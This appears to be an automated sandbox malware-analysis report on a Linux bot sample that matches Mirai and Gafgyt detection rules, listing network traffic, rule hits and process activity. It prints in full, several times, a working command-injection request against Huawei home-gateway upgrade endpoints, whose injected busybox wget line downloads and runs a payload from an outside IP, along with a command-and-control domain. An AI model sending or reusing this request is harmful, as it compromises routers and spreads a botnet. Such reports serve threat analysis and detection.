3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownTCP traffic detected without corresponding DNS query: 208.124.181.23
              Source: unknownTCP traffic detected without corresponding DNS query: 87.244.2.228
              Source: unknownTCP traffic detected without corresponding DNS query: 182.234.213.23
              Source: unknownTCP traffic detected without corresponding DNS query: 197.197.97.165
              Source: unknownTCP traffic detected without corresponding DNS query: 157.168.109.55
              Source: unknownTCP traffic detected without corresponding DNS query: 197.52.189.118
              Source: unknownTCP traffic detected without corresponding DNS query: 157.13.197.70
              Source: unknownTCP traffic detected without corresponding DNS query: 109.1.27.171
              Source: unknownTCP traffic detected without corresponding DNS query: 157.244.154.198
              Source: unknownTCP traffic detected without corresponding DNS query: 41.233.7.167
              Source: unknownTCP traffic detected without corresponding DNS query: 141.222.161.11
              Source: unknownTCP traffic detected without corresponding DNS query: 197.58.200.228
              Source: unknownTCP traffic detected without corresponding DNS query: 157.89.87.90
              Source: unknownTCP traffic detected without corresponding DNS query: 197.125.79.131
              Source: unknownTCP traffic detected without corresponding DNS query: 157.71.251.175
              Source: unknownTCP traffic detected without corresponding DNS query: 41.106.66.96
              Source: unknownTCP traffic detected without corresponding DNS query: 157.41.122.189
              Source: unknownTCP traffic detected without corresponding DNS query: 41.111.160.145
              Source: unknownTCP traffic detected without corresponding DNS query: 41.193.223.40
              Source: unknownTCP traffic detected without corresponding DNS query: 197.152.81.19
              Source: unknownTCP traffic detected without corresponding DNS query: 41.59.26.249
              Source: unknownTCP traffic detected without corresponding DNS query: 197.96.90.236
              Source: unknownTCP traffic detected without corresponding DNS query: 157.145.231.62
              Source: unknownTCP traffic detected without corresponding DNS query: 41.25.79.119
              Source: unknownTCP traffic detected without corresponding DNS query: 157.235.71.192
              Source: unknownTCP traffic detected without corresponding DNS query: 41.93.76.55
              Source: unknownTCP traffic detected without corresponding DNS query: 41.251.205.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.164.86.247
              Source: unknownTCP traffic detected without corresponding DNS query: 171.254.229.146
              Source: unknownTCP traffic detected without corresponding DNS query: 222.67.46.19
              Source: unknownTCP traffic detected without corresponding DNS query: 197.186.242.51
              Source: unknownTCP traffic detected without corresponding DNS query: 157.76.143.153
              Source: unknownTCP traffic detected without corresponding DNS query: 132.29.29.28
              Source: unknownTCP traffic detected without corresponding DNS query: 197.44.109.238
              Source: unknownTCP traffic detected without corresponding DNS query: 125.127.51.243
              Source: unknownTCP traffic detected without corresponding DNS query: 197.78.100.217
              Source: unknownTCP traffic detected without corresponding DNS query: 151.61.242.30
              Source: unknownTCP traffic detected without corresponding DNS query: 197.202.2.250
              Source: unknownTCP traffic detected without corresponding DNS query: 157.156.182.95
              Source: unknownTCP traffic detected without corresponding DNS query: 41.102.206.243
              Source: unknownTCP traffic detected without corresponding DNS query: 157.184.5.53
              Source: unknownTCP traffic detected without corresponding DNS query: 157.137.49.12
              Source: unknownTCP traffic detected without corresponding DNS query: 84.20.71.121
              Source: unknownTCP traffic detected without corresponding DNS query: 41.190.231.89
              Source: unknownTCP traffic detected without corresponding DNS query: 143.243.32.250
              Source: unknownTCP traffic detected without corresponding DNS query: 197.83.47.218
              Source: unknownTCP traffic detected without corresponding DNS query: 41.1.40.173
              Source: unknownTCP traffic detected without corresponding DNS query: 197.171.38.12
              Source: unknownTCP traffic detected without corresponding DNS query: 197.102.83.10
              Source: unknownTCP traffic detected without corresponding DNS query: 197.220.214.107
              Source: global trafficDNS traffic detected: DNS query: ok.ditmemost.click
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: bot.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: bot.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 58872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58872

              System Summary

              barindex
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
              Source: Process Memory Space: bot.x86.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbot.armbot.arm7bot.mipsbot.mipselbot.x86_64bot.sh4bot.ppcbot.m68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
              Source: bot.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
              Source: 5427.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
              Source: Process Memory Space: bot.x86.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: classification engineClassification label: mal100.troj.linELF@0/0@19/0
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/5266/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/230/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/110/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/231/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/111/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/232/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/112/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/233/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/113/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/234/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/114/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/235/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/115/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/236/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/116/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/237/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/117/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/238/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/118/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/239/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/119/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/914/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/10/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/917/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/11/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/12/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/13/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/14/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/15/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/16/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/17/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/18/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/19/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/240/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/3095/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/120/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/241/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/121/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/242/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/122/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/243/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/2/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/123/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/244/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/3/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/124/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/245/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1588/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/125/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/4/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/246/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/126/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/5/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/247/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/127/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/6/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/248/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/128/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/7/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/249/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/129/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/8/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/800/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/3762/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/9/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1906/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/802/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/803/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/20/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/21/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/22/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/23/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/24/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/25/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/26/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/27/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/28/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/29/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/3420/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1482/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/490/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1480/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/250/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/371/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/130/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/251/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/131/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/252/cmdlineJump to behavior
